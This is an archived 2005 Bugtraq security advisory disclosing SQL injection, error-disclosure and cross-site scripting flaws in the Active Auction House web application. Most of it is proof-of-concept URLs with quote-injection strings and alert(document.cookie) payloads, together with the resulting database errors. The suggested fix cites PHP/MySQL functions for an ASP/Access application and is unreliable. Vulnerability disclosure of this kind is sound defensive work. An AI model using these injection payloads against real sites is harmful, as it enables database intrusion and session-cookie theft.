NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 2005-04

Active Auction House has multiple Sql injection, error and XSS vulnerabilities

From: dcrab (dcrabhackerscenter.com)
Date: Tue Apr 05 2005 - 20:06:59 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah

Severity: High
Title: Active Auction House has multiple Sql injection, error and XSS vulnerabilities
Date: 06/04/2005

Vendor: Active Web Softwares
Vendor Website: www.activewebsoftwares.com
Summary: Active auction house has multiple sql injection, error and xss vulnerabilities.

Proof of Concept Exploits:

http://localhost/activeauctionsuperstore/default.asp?catid='SQL_ERROR
SQL ERROR
Microsoft OLE DB Provider for ODBC Drivers error '80040e21'

ODBC driver does not support the requested properties.

/activeauctionsuperstore/displaycategories.asp, line 52

http://localhost/activeauctionsuperstore/default.asp?Sortby=ItemName&SortDir='SQL_INJECTION
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'ItemName 'SQL_INJECTION'.

/activeauctionsuperstore/includes/gentable.asp, line 39

http://localhost/activeauctionsuperstore/default.asp?Sortby='SQL_INJECTION
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression ''SQL_INJECTION'.

/activeauctionsuperstore/includes/gentable.asp, line 39

http://localhost/activeauctionsuperstore/ItemInfo.asp?itemID='SQL_INJECTION
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'ItemID='SQL_INJECTION'.

/activeauctionsuperstore/ItemInfo.asp, line 18

http://localhost/activeauctionsuperstore/sendpassword.asp
SQL INJECTON
In the Email field enter a sql injection and done ;) For example
entering 'SQL_INJECTION you get
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in FROM
clause.

/activeauctionsuperstore/sendpassword.asp, line 45

http://localhost/activeauctionsuperstore/?ReturnURL='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&username=dcrab&password=
Pops cookie

http://localhost/activeauctionsuperstore/?ReturnURL=start.asp&username=dcrab&password='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie

http://localhost/activeauctionsuperstore/?ReturnURL=start.asp&username='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&&password=
Pops cookie

http://localhost/activeauctionsuperstore/account.asp?ReturnURL=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie

http://localhost/activeauctionsuperstore/sendpassword.asp?Table=Accounts&Title='php_evil_valuehttp://localhost/activeauctionsuperstore/sendpassword.asp?Table=Accounts&Title=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie

http://localhost/activeauctionsuperstore/sendpassword.asp?Table=Accounts&Title="><script>alert(document.cookie)</script>
Pops cookie

http://localhost/activeauctionsuperstore/sendpassword.asp?Table="><script>alert(document.cookie)</script>&Title=Account
Pops cookie

http://localhost/activeauctionsuperstore/watchthisitem.asp?itemid="><script>alert(document.cookie)</script>&amp%3baccountid=
Pops cookie

Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), mysql_real_escape_string() and other functions for input validation before passing user input to the mysql database, or before echoing data on the screen, would solve these problems.

Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah

Author:
These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for my soon to come out book on Secure coding with php.

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com

iQA/AwUBQlLSLSZV5e8av/DUEQJy+wCfficKxFWekfTVbslFf6X2fYgkFZ0AniJA
lWYvwOWmoKGHgDKanamGDcvc
=GAwn
-----END PGP SIGNATURE-----

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]